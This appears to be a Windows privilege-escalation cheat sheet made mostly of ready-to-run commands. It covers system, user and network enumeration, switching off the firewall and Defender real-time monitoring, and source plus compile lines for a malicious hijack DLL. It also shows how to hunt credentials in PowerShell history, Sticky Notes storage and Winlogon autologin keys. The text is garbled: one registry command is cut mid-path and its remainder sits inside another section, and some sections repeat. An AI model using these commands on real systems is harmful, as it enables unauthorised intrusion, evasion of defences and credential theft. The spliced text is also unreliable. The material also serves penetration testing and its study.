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System information

Global information


Extract patchs and updates

wmic qfe


wmic os get osarchitecture

List all env variables

Get-ChildItem Env: | ft Key,Value

List all drives

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

Users / Groups

Get current username

echo %USERNAME% || whoami

List user privilege

whoami /priv
whoami /groups

List all users

net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name

List logon requirements; useable for bruteforcing

net accounts

Get details about a user (i.e. administrator, admin, current user)

net user administrator
net user <user>

## DLL Injection

Load order of dlls:
 => Local FOlder

List all local groups

net localgroup
Get-LocalGroup | ft Name

Get details about a group (i.e. administrators)

net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource


List all network interfaces, IP, and DNS.

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

List current routing table

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

List the ARP table

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

List all current connections

netstat -ano

List firewall state and current configuration

netsh advfirewall firewall dump


netsh firewall show state
netsh firewall show config

List firewall’s blocked ports

$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports

Disable firewall

netsh firewall set opmode disable
netsh advfirewall set allprofiles state off

List all network shares

net share

SNMP Configuration

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\C

## EoP - Processes Enumeration and Tasks

What processes are running?

tasklist /v
net start
sc query

Do you have powershell magic?

REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion

List installed programs

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

List services

net start
wmic service list brief
tasklist /SVC

Scheduled tasks

schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

Startup tasks

wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

EoP - Incorrect permissions in services

A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system.

Often, services are pointing to writeable locations:

  • Orphaned installs, not installed anymore but still exist in startup
  • DLL Hijacking ```powershell # find missing DLL
    • Find-PathDLLHijack PowerUp.ps1
    • Process Monitor : check for “Name Not Found”

    # compile a malicious dll

    • For x64 compile with: “x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll”
    • For x86 compile with: “i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll”

    # content of windows_dll.c #include BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { if (dwReason == DLL_PROCESS_ATTACH) { system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt"); ExitProcess(0); } return TRUE; } ```

  • PATH directories with weak permissions
$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

$ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

Alternatively you can use the Metasploit exploit : exploit/windows/local/service_permissions

Note to check file permissions you can use cacls and icacls

icacls (Windows Vista +)
cacls (Windows XP)

You are looking for BUILTIN\Users:(F)(Full access), BUILTIN\Users:(M)(Modify access) or BUILTIN\Users:(W)(Write-only access) in the output. urrentControlSet\Services\SNMP -Recurse

## Windows Defender

# check status of Defender
PS C:\> Get-MpComputerStatus

# disable Real Time Monitoring
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus


Read Key

reg query "key"

Read a value of a certain sub key

REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList


reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin

Processes Enumeration and Tasks

What processes are running?

tasklist /v
net start
sc query
ps -W

Which processes are running as “system”

tasklist /v /fi "username eq system"

Do you have powershell magic?

REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion

List services

net start
wmic service list brief
tasklist /SVC

Scheduled tasks

schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State


DLL loading order:

  • Memory
  • Local Folder <= We can inject here if writeable
  • System <= Injectable but rare

Run a dll manually

rundll32.exe test.dll,entrypoint

Get dll used by a program that matches git.exe

listdlls.exe git.exe

Sticky Notes passwords

The sticky notes app stores it’s content in a sqlite db located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

Powershell history

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

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